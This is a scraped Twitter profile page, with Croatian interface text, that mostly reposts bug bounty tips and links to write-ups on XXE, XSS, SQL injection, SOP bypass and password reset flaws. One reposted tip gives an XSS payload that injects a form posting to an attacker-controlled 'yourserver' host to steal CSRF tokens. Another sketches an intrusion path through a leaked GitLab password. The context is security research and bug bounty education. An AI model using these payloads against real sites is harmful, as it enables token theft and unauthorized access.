Tweetovi
- Tweetovi, trenutna stranica.
- Tweetovi i odgovori
- Medijski sadržaj
Blokirali ste korisnika/cu @Dark3rH4cK
Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @Dark3rH4cK
-
Prikvačeni tweetHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi
-
Darkerhack proslijedio/la je Tweet
#bugbountytips on exploiting XXE vulnerability from different angles.@stokfredrik I know you LOVE XXE, let me know if this video paves the way for new#BugBounty hunters to understand your interesting $7k bug!https://youtu.be/M0QPwIp4GswHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Darkerhack proslijedio/la je Tweet
The DNS service is essential for browsing the
#internet
What about the vulnerabilities of this service?
I made an #infographic that presents an attack called DNS Poisoning. Follow@SecurityGuill for more#Infographics about#infosec#cybersecurity#ITsecurity#techpic.twitter.com/k0iyF96Jbg
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Darkerhack proslijedio/la je Tweet
RCE story http://1.site.com/admin Forbidden 2.HTTP header in request - Login page access 3. Sqli queries tried no success 4. Some recon on gitlab - Found base64 pwd - decrypt 5. Accessed admin panel 6. Admin panel customized - CLI available 7. File read successful
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Darkerhack proslijedio/la je Tweet
Today, we are launching
#BugBusiness, a series of interviews with#BugBounty hunters. In our first edition, we are discussing logic flaws and@securitytxt with@EdOverflow !
Who would you like to see interviewed next? Leave a comment!
http://go.intigriti.com/bugbusiness-1 Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Darkerhack proslijedio/la je Tweet
My
@Pornhub Hacking Channel is now LIVE! Check out my first video (the USB-C one) and get ready for much more! I will be putting my streaming archives here from now on. :) https://www.pornhub.com/view_video.php?viewkey=ph5e377ff73a84a …pic.twitter.com/6WxaWWIgv0
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Darkerhack proslijedio/la je Tweet
New Write-up on InfoSec Write-ups publication : "Exploiting HTTP Verbs"https://ift.tt/2OmLFxQ
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Darkerhack proslijedio/la je Tweet
SQL Injection Payload List by
#ismailtasdelen https://link.medium.com/lxgpVQNUK3 Password Cracking Is Easy: Here’s How to Do It by@KennyMuLi in@TDataScience https://towardsdatascience.com/password-cracking-is-easy-heres-how-to-do-it-875806a1e42a … API Security Testing(Part 1) by Saumya Prakash Ranahttps://link.medium.com/tFlFCFfVK3Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Darkerhack proslijedio/la je Tweet
NEW BLOG POST ON RECON ON SHODAN PUBLISHED BY ME DO TAKE A READ AND SHARE
https://medium.com/@malavsharma/magic-of-shodan-15dd17854099 …Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Darkerhack proslijedio/la je Tweet
Attention CTF players (and organizers, CTFd v2.0.0 - v2.2.2 has a serious vulnerability (CVE-2020-7245) in which an attacker could perform account takeover using a leading-trailing on the Registration form. It has been fixed in v2.2.3. https://github.com/CTFd/CTFd/releases/tag/2.2.3 … Make sure to update!
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Darkerhack proslijedio/la je Tweet
Reflected XSS https://link.medium.com/j1cgHbZpq3 https://link.medium.com/q9eeokp2J3 https://link.medium.com/5zdO3gPEw3 https://link.medium.com/vwwEcNQEw3 https://link.medium.com/TH0sHaq2J3 https://link.medium.com/njXx6sq2J3 https://victoni.github.io/bug-hunting-xss-on-cookie-popup-warning … https://gauravnarwani.com/cookie-worth-a-fortune … https://link.medium.com/bx6lLPq2J3 https://link.medium.com/3khM76q2J3
#bugbountyHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Darkerhack proslijedio/la je Tweet
SOP bypass SOP Bypass via browser-cache https://enumerated.wordpress.com/2019/12/24/sop-bypass-via-browser-cache … Exploiting a Microsoft Edge Vulnerability to Steal Files https://www.netsparker.com/blog/web-security/stealing-local-files-with-simple-html-file … Google sites and exploiting same origin policy https://link.medium.com/RejU1vJyI3 https://thehackerblog.com/reading-your-emails-with-a-readwrite-chrome-extension-same-origin-policy-bypass-8-million-users-affected/index.html …
#bugbounty,#bugbountytipsHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi
-
Darkerhack proslijedio/la je Tweet
2019 has been a record-breaking year on lots of fronts - thanks to you all! Keep up your awesome discoveries.https://security.googleblog.com/2020/01/vulnerability-reward-program-2019-year.html …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Darkerhack proslijedio/la je Tweet
Password reset flaw https://link.medium.com/OVvYaKLng3 https://link.medium.com/HZpTPtR2F3 https://link.medium.com/bpYhuYR2F3 https://link.medium.com/5PnwoRS2F3 https://link.medium.com/A67jqlT2F3 https://thezerohack.com/hack-instagram-again … https://ninadmathpati.com/how-i-was-able-to-earn-1000-with-just-10-minutes-of-bug-bounty … https://link.medium.com/MgdJoyY2F3 https://link.medium.com/iRVWjs02F3 https://link.medium.com/roeUih12F3
#bugbountyHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Darkerhack proslijedio/la je Tweet
Linux Reverse Engineering CTFs for Beginnershttps://medium.com/bugbountywriteup/linux-reverse-engineering-ctfs-for-beginners-4cf03ff2cfb4?source=rss----7b722bfd1b8d---4 …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Darkerhack proslijedio/la je Tweet
Some
#bugbounty hunters made over €50.000 in bug bounties with this simple trick.
Thanks for the #BugBountyTip,@rez0__!pic.twitter.com/z9sPFJTNqV
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
I strongly recommend this to new comers in Infosec



https://twitter.com/vickieli7/status/1217944140903800832 …Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Darkerhack proslijedio/la je Tweet
Multiple Vul in (*.blog.yelp.com) - Leakage user admin Sensitive Exposure *. https://blog.yelp.com/wp-json/ - user-admin sensitive exposure *. https://blog.yelp.com/wp-login.php - Admin-Page disclousure Add Param Origin in Req Header Origin http://127.0.0.1:8080 https://hackerone.com/reports/779656 pic.twitter.com/obIRivS3NZ
Ovo je potencijalno osjetljiv multimedijski sadržaj. Saznajte više
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Darkerhack proslijedio/la je Tweet
Web Application Penetration Testing Cheat Sheet Cross-site Request Forgery SQL injection Cross-site Scripting Offline Password Cracking Remote File Inclusion Local File Inclusion Open Redirection OS Command Injection XML External Entities Vul Scanninghttps://web.archive.org/web/20190507102921/https://jdow.io/blog/2018/03/18/web-application-penetration-testing-methodology/#testing-session-tokens-with-burp …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Darkerhack proslijedio/la je Tweet
If you have a XSS in a <form> tag, close it and open a new form that you are controlling. Payload : "></form><form action="http://yourserver/> This is just a short payload for increasing the severity.
#bugbountytip#bugbountytipshttps://sametsahin.net/posts/steal-csrf-tokens-with-simple-xss/ …Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi
Čini se da učitavanje traje već neko vrijeme.
Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.
